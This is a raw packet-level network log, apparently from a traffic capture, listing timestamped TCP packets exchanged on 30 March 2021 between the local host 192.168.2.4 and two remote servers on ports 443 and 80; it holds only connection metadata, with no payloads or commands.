Mar 30, 2021 14:22:46.523683071 CEST	443	49743	195.201.225.248	192.168.2.4
Mar 30, 2021 14:22:46.564462900 CEST	443	49743	195.201.225.248	192.168.2.4
Mar 30, 2021 14:22:46.564501047 CEST	443	49743	195.201.225.248	192.168.2.4
Mar 30, 2021 14:22:46.564538002 CEST	443	49743	195.201.225.248	192.168.2.4
Mar 30, 2021 14:22:46.564549923 CEST	443	49743	195.201.225.248	192.168.2.4
Mar 30, 2021 14:22:46.564619064 CEST	49743	443	192.168.2.4	195.201.225.248
Mar 30, 2021 14:22:46.564750910 CEST	49743	443	192.168.2.4	195.201.225.248
Mar 30, 2021 14:22:46.573488951 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:46.660355091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:46.664547920 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:46.680660963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:46.680695057 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:46.769927025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:46.769961119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:47.493658066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:47.545175076 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:47.594737053 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:47.684925079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.132806063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.132913113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.132955074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.132993937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.133033037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.133070946 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.133111000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.133152962 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.133153915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.133193970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.133232117 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.133234978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.133351088 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.221698046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.221757889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.221854925 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.221910954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.221956015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.221996069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222034931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222048044 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222074032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222115040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222141027 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222163916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222172022 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222208023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222244978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222284079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222311974 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222322941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222335100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222362995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222403049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222440004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222455025 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222487926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222491980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222531080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222568035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222583055 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.222606897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.222702980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.309556961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309626102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309674978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309720993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309720993 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.309762001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309793949 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.309803009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309843063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309880972 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309894085 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.309921026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.309923887 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.309959888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310002089 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310009003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310053110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310091019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310102940 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310132027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310172081 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310177088 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310209036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310249090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310252905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310287952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310336113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310378075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310383081 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310415983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310419083 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310456991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310496092 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310534000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310540915 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310574055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310574055 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310614109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310656071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310664892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310710907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310750961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310772896 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310791016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310830116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310837984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310868979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310909986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310914993 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.310950041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.310997963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.311042070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.311044931 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.311079025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.311084986 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.311120033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.311158895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.311197042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.311204910 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.311239958 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399076939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399142027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399180889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399216890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399251938 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399286985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399306059 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399323940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399342060 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399360895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399383068 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399406910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399435997 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399447918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399482965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399512053 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399518967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399585009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399602890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399622917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399661064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399676085 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399701118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399746895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399785042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399806976 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399821043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399857998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399893045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399919033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399928093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.399925947 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.399966002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400001049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400046110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400047064 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400077105 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400087118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400121927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400157928 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400173903 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400194883 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400206089 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400229931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400269985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400283098 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400305986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400352001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400392056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400418043 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400428057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400444984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400465012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400501013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400530100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400535107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400572062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400608063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400625944 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400652885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400686979 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400692940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400728941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400751114 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400765896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400801897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400835991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400856018 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400872946 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400890112 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.400909901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.400986910 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491054058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491095066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491168022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491195917 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491204977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491229057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491250038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491271973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491280079 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491293907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491313934 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491317034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491337061 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491343021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491368055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491389990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491395950 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491413116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491432905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491436005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491458893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491482019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491492033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491503954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491523981 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491528988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491553068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491569996 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491575956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491597891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491620064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491625071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491642952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491666079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491681099 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491691113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491717100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491719007 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491739988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491759062 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491763115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491786003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491807938 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491821051 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491828918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491852999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491854906 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491877079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491889954 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491903067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491925955 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491947889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491956949 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.491970062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491993904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.491997957 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.492014885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492037058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492038965 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.492058039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492082119 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.492082119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492106915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492121935 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.492127895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492151022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492172956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492193937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492194891 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.492221117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.492227077 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.492269993 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.579526901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579597950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579621077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579642057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579663992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579684973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579710960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579734087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579756021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579776049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579797029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579802990 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.579818010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579840899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579862118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579886913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579909086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579921007 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.579931021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579952955 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579972982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.579992056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580008030 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580015898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580039024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580065012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580081940 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580087900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580108881 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580128908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580148935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580156088 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580169916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580188990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580209017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580234051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580238104 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580255985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580277920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580298901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580316067 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580318928 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580339909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580359936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580379963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580393076 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580404997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580426931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580446959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580470085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580475092 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580491066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580509901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580530882 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580550909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580562115 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580578089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580600023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.580671072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.580733061 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:48.661992073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662029028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662045956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662064075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662086010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662107944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662133932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:48.662158012 CEST	80	49744	45.139.236.6	192.168.2.4
